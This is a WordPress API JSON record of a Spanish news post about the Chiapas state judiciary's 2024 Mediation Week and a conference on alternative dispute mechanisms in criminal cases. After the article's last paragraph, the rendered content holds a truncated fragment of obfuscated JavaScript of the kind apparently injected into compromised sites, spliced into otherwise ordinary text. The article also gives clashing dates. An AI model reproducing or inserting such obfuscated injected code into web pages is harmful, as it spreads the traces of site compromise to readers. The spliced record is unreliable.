{"id":18083,"date":"2024-09-27T03:29:04","date_gmt":"2024-09-27T03:29:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18083"},"modified":"2024-09-27T03:29:05","modified_gmt":"2024-09-27T03:29:05","slug":"continua-en-el-poder-judicial-del-estado-actividades-de-la-semana-de-mediacion-2024-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18083","title":{"rendered":"Contin\u00faa en el Poder Judicial del Estado actividades de la Semana de Mediaci\u00f3n 2024"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"18084\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407657972-1024x576.jpg\" alt=\"\" class=\"wp-image-18084\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407657972-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407657972-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407657972-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727407657972.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>26 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado que encabeza el magistrado presidente, Guillermo Ramos P\u00e9rez, llev\u00f3 a cabo por segundo d\u00eda, las actividades en el marco de la Semana de Mediaci\u00f3n 2024 por una Cultura de Paz, en conmemoraci\u00f3n del 13\u00ba aniversario de la implementaci\u00f3n de la Justicia Alternativa en la entidad.<br>En este segundo d\u00eda, se realiz\u00f3 la conferencia titulada: MASC en el proceso penal acusatorio y oral, del CNPP a la Ley Nacional de MASC en materia penal. An\u00e1lisis y retos, impartida por el director de Profesionalizaci\u00f3n de la Fiscal\u00eda General del Estado, Manuel de Jes\u00fas Corado de Paz.<br>Continuando con la modalidad h\u00edbrida, a trav\u00e9s de Facebook Live y presencial en la Sala de Presidentes del Palacio de Justicia en Tuxtla Guti\u00e9rrez, el tambi\u00e9n director general del Centro Iberoamericano de Investigaciones Jur\u00eddicas y Sociales, Corado de Paz, profundiz\u00f3 en los acuerdos reparatorios, la extinci\u00f3n de la acci\u00f3n penal, los tipos de delitos procedentes, as\u00ed como los derechos y obligaciones de las partes participantes, entre otros.<br>Al finalizar la conferencia, la directora general del Centro Estatal de Justicia Alternativa, Elisheba Goldhaber Pasillas entreg\u00f3 un reconocimiento al ponente e hizo extensiva la invitaci\u00f3n para seguir la \u00faltima conferencia del ciclo, con el tema \u201cLa importancia de la incorporaci\u00f3n de la Justicia Restaurativa en los procesos jurisdiccionales\u201d, este mi\u00e9rcoles 25 de septiembre.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 26 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado que encabeza el magistrado presidente, Guillermo Ramos P\u00e9rez, llev\u00f3 a cabo por segundo d\u00eda, las actividades en el marco de la Semana de Mediaci\u00f3n 2024 por una Cultura de Paz, en conmemoraci\u00f3n del 13\u00ba aniversario de la implementaci\u00f3n de la Justicia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18084,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18083","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18083","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18083"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18083\/revisions"}],"predecessor-version":[{"id":18085,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18083\/revisions\/18085"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18084"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18083"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18083"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18083"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}